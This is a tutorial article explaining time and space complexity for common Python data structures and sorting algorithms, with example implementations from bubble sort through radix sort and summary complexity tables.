Space complexity refers to the amount of memory an algorithm uses relative to the size of the input. This is also expressed in Big-O notation. For instance, sorting an array in-place (i.e., modifying the input array) requires \(O(1)\) auxiliary space, whereas Merge Sort requires \(O(n)\) additional space to store the temporary arrays created during the merge process.

Why Algorithmic Complexity Matters

Understanding the time and space complexity of algorithms is crucial because it helps you:

  • Predict Performance: You can estimate how an algorithm will perform on large inputs, avoiding slowdowns that may arise with inefficient algorithms.
  • Choose the Right Tool: For example, you might choose a hash table (with \(O(1)\) lookup) over a binary search tree (with \(O(\log n)\) lookup) when you need fast access times.
  • Optimize Code: Knowing the time complexity helps identify bottlenecks and guides you in writing more efficient code.

Data Structures

Lists

Python lists are dynamic arrays that support random access. They are versatile and frequently used due to their built-in functionality.

# Python List Example
my_list = [1, 2, 3, 4]
my_list.append(5)    # O(1) - Insertion at the end
my_list.pop()        # O(1) - Deletion at the end
print(my_list[0])    # O(1) - Access

Complexity

  • Access: \(O(1)\)
  • Search: \(O(n)\)
  • Insertion (at end): \(O(1)\)
  • Deletion (at end): \(O(1)\)

Arrays

Arrays are fixed-size collections that store elements of the same data type. While Python lists are dynamic, we can use the array module to simulate arrays.

import array
my_array = array.array('i', [1, 2, 3])
my_array.append(4)
print(my_array)

Complexity

  • Access: \(O(1)\)
  • Search: \(O(n)\)
  • Insertion/Deletion: \(O(n)\)

Stacks

A Stack is a Last-In-First-Out (LIFO) structure. Python lists can be used to simulate stack operations with append() and pop().

class Stack:
    def __init__(self):
        self.stack = []

    def push(self, value):
        self.stack.append(value)

    def pop(self):
        return self.stack.pop()

my_stack = Stack()
my_stack.push(1)
my_stack.push(2)
print(my_stack.pop())  # O(1)

Complexity

  • Push/Pop: \(O(1)\)
  • Peek: \(O(1)\)
  • Search: \(O(n)\)

Queues

A Queue is a First-In-First-Out (FIFO) structure. Python’s collections.deque is efficient for this purpose.

from collections import deque
queue = deque()
queue.append(1)  # Enqueue
queue.append(2)
print(queue.popleft())  # Dequeue O(1)

Complexity

  • Enqueue/Dequeue: \(O(1)\)
  • Search: \(O(n)\)

Sets

Sets are unordered collections with no duplicates. Python’s set is implemented as a hash table.

my_set = set()
my_set.add(1)  # O(1)
my_set.remove(1)  # O(1)
print(1 in my_set)  # O(1)

Complexity

  • Add: \(O(1)\)
  • Remove: \(O(1)\)
  • Search: \(O(1)\)

Maps (Dictionaries)

Dictionaries store key-value pairs and are implemented as hash tables in Python.

my_dict = {}
my_dict['key'] = 'value'  # O(1)
del my_dict['key']  # O(1)
print('key' in my_dict)  # O(1)

Complexity

  • Insertion/Lookup/Deletion: \(O(1)\)

Trees

Trees are hierarchical data structures that allow efficient searching and sorting. A Binary Search Tree (BST) is one common example.

class Node:
    def __init__(self, key):
        self.left = None
        self.right = None
        self.value = key

def insert(root, key):
    if root is None:
        return Node(key)
    if key < root.value:
        root.left = insert(root.left, key)
    else:
        root.right = insert(root.right, key)
    return root

root = None
root = insert(root, 10)
root = insert(root, 20)
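
Searching follows the same shape as insertion, walking left or right at each node until the key is found or we fall off the tree. A small sketch building on the Node class above:

def search(root, key):
    # Walk down the tree, choosing a side at each node
    if root is None or root.value == key:
        return root
    if key < root.value:
        return search(root.left, key)
    return search(root.right, key)

print(search(root, 20) is not None)  # True
print(search(root, 99) is not None)  # False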

Complexity

  • Insertion/Search/Deletion: \(O(\log n)\) for balanced trees, \(O(n)\) for unbalanced trees.

Heaps

Heaps are specialized tree-based structures where the parent node is always greater (max-heap) or smaller (min-heap) than its children.

import heapq
heap = []
heapq.heappush(heap, 10)  # O(log n)
heapq.heappush(heap, 5)
print(heapq.heappop(heap))  # O(log n)

Complexity

  • Insertion/Deletion: \(O(\log n)\)
  • Peek: \(O(1)\)

Sorting Algorithms

Now we’ll talk about some very common sorting algorithms and understand their complexity, to better equip ourselves to choose the right sort for a given situation.

Bubble Sort

Repeatedly swap adjacent elements if they are in the wrong order.

def bubble_sort(arr):
    for i in range(len(arr)):
        for j in range(0, len(arr) - i - 1):
            if arr[j] > arr[j + 1]:
                arr[j], arr[j + 1] = arr[j + 1], arr[j]

arr = [5, 2, 9, 1, 5, 6]
bubble_sort(arr)
print(arr)

Complexity

  • Best: \(O(n)\)
  • Average/Worst: \(O(n^2)\)
  • Space: \(O(1)\)

Selection Sort

Repeatedly select the smallest remaining element and swap it into the current position.

def selection_sort(arr):
    for i in range(len(arr)):
        min_idx = i
        for j in range(i + 1, len(arr)):
            if arr[j] < arr[min_idx]:
                min_idx = j
        arr[i], arr[min_idx] = arr[min_idx], arr[i]

arr = [64, 25, 12, 22, 11]
selection_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(n^2)\)
  • Space: \(O(1)\)

Insertion Sort

Insert each element into its correct position in the sorted portion of the array.

def insertion_sort(arr):
    for i in range(1, len(arr)):
        key = arr[i]
        j = i - 1
        while j >= 0 and key < arr[j]:
            arr[j + 1] = arr[j]
            j -= 1
        arr[j + 1] = key

arr = [12, 11, 13, 5, 6]
insertion_sort(arr)
print(arr)

Complexity

  • Best: \(O(n)\)
  • Average/Worst: \(O(n^2)\)
  • Space: \(O(1)\)

Merge Sort

A divide-and-conquer algorithm that splits the array in half, recursively sorts each half, and merges the halves back together in sorted order.

def merge_sort(arr):
    if len(arr) > 1:
        mid = len(arr) // 2
        left = arr[:mid]
        right = arr[mid:]

        merge_sort(left)
        merge_sort(right)

        i = j = k = 0
        while i < len(left) and j < len(right):
            if left[i] < right[j]:
                arr[k] = left[i]
                i += 1
            else:
                arr[k] = right[j]
                j += 1
            k += 1

        while i < len(left):
            arr[k] = left[i]
            i += 1
            k += 1

        while j < len(right):
            arr[k] = right[j]
            j += 1
            k += 1

arr = [12, 11, 13, 5, 6, 7]
merge_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(n \log n)\)
  • Space: \(O(n)\)

Quick Sort

Picks a pivot and partitions the array around the pivot.

def partition(arr, low, high):
    pivot = arr[high]
    i = low - 1
    for j in range(low, high):
        if arr[j] <= pivot:
            i += 1
            arr[i], arr[j] = arr[j], arr[i]
    arr[i + 1], arr[high] = arr[high], arr[i + 1]
    return i + 1

def quick_sort(arr, low, high):
    if low < high:
        pi = partition(arr, low, high)
        quick_sort(arr, low, pi - 1)
        quick_sort(arr, pi + 1, high)

arr = [10, 7, 8, 9, 1, 5]
quick_sort(arr, 0, len(arr) - 1)
print(arr)

Complexity

  • Best/Average: \(O(n \log n)\)
  • Worst: \(O(n^2)\)
  • Space: \(O(\log n)\)

Heap Sort

Uses a heap data structure to find the maximum or minimum element.

def heapify(arr, n, i):
    largest = i
    l = 2 * i + 1
    r = 2 * i + 2

    if l < n and arr[l] > arr[largest]:
        largest = l

    if r < n and arr[r] > arr[largest]:
        largest = r

    if largest != i:
        arr[i], arr[largest] = arr[largest], arr[i]
        heapify(arr, n, largest)

def heap_sort(arr):
    n = len(arr)
    for i in range(n // 2 - 1, -1, -1):
        heapify(arr, n, i)
    for i in range(n - 1, 0, -1):
        arr[i], arr[0] = arr[0], arr[i]
        heapify(arr, i, 0)

arr = [12, 11, 13, 5, 6, 7]
heap_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(n \log n)\)
  • Space: \(O(1)\)

Bucket Sort

Distributes elements into buckets and sorts them individually.

def bucket_sort(arr):
    # Create one bucket per element (assumes input values are in the range [0, 1))
    n = len(arr)
    bucket = []
    for i in range(n):
        bucket.append([])

    # Scatter: place each value into its bucket
    for j in arr:
        index_b = int(n * j)
        bucket[index_b].append(j)

    for i in range(len(arr)):
        bucket[i] = sorted(bucket[i])

    k = 0
    for i in range(len(arr)):
        for j in range(len(bucket[i])):
            arr[k] = bucket[i][j]
            k += 1

arr = [0.897, 0.565, 0.656, 0.1234, 0.665]
bucket_sort(arr)
print(arr)

Complexity

  • Best: \(O(n+k)\)
  • Average/Worst: \(O(n^2)\)
  • Space: \(O(n+k)\)

Radix Sort

Sorts numbers digit by digit starting from the least significant digit.

def counting_sort(arr, exp):
    n = len(arr)
    output = [0] * n
    count = [0] * 10

    for i in range(n):
        index = arr[i] // exp
        count[index % 10] += 1

    for i in range(1, 10):
        count[i] += count[i - 1]

    i = n - 1
    while i >= 0:
        index = arr[i] // exp
        output[count[index % 10] - 1] = arr[i]
        count[index % 10] -= 1
        i -= 1

    for i in range(len(arr)):
        arr[i] = output[i]

def radix_sort(arr):
    max_val = max(arr)
    exp = 1
    while max_val // exp > 0:
        counting_sort(arr, exp)
        exp *= 10

arr = [170, 45, 75, 90, 802, 24, 2, 66]
radix_sort(arr)
print(arr)

Complexity

  • Best/Average/Worst: \(O(nk)\)
  • Space: \(O(n+k)\)

Conclusion

We’ve explored a wide range of data structures and sorting algorithms, discussing their Python implementations, and breaking down their time and space complexities. These foundational concepts are essential for any software developer to understand, and mastering them will improve your ability to choose the right tools and algorithms for a given problem.

Below is a table outlining these complexities for the data structures we covered:

Data Structure Access Time Search Time Insertion Time Deletion Time Space Complexity
List (Array) \(O(1)\) \(O(n)\) \(O(n)\) \(O(n)\) \(O(n)\)
Stack \(O(n)\) \(O(n)\) \(O(1)\) \(O(1)\) \(O(n)\)
Queue \(O(n)\) \(O(n)\) \(O(1)\) \(O(1)\) \(O(n)\)
Set N/A \(O(1)\) \(O(1)\) \(O(1)\) \(O(n)\)
Dictionary N/A \(O(1)\) \(O(1)\) \(O(1)\) \(O(n)\)
Binary Tree (BST) \(O(\log n)\) \(O(\log n)\) \(O(\log n)\) \(O(\log n)\) \(O(n)\)
Heap (Binary) \(O(n)\) \(O(n)\) \(O(\log n)\) \(O(\log n)\) \(O(n)\)

Below is a quick summary of the time complexities of the sorting algorithms we covered:

Algorithm Best Time Complexity Average Time Complexity Worst Time Complexity Auxiliary Space
Bubble Sort \(O(n)\) \(O(n^2)\) \(O(n^2)\) \(O(1)\)
Selection Sort \(O(n^2)\) \(O(n^2)\) \(O(n^2)\) \(O(1)\)
Insertion Sort \(O(n)\) \(O(n^2)\) \(O(n^2)\) \(O(1)\)
Merge Sort \(O(n \log n)\) \(O(n \log n)\) \(O(n \log n)\) \(O(n)\)
Quick Sort \(O(n \log n)\) \(O(n \log n)\) \(O(n^2)\) \(O(\log n)\)
Heap Sort \(O(n \log n)\) \(O(n \log n)\) \(O(n \log n)\) \(O(1)\)
Bucket Sort \(O(n + k)\) \(O(n + k)\) \(O(n^2)\) \(O(n + k)\)
Radix Sort \(O(nk)\) \(O(nk)\) \(O(nk)\) \(O(n + k)\)

Keep this table handy as a reference for making decisions on the appropriate sorting algorithm based on time and space constraints.

Happy coding!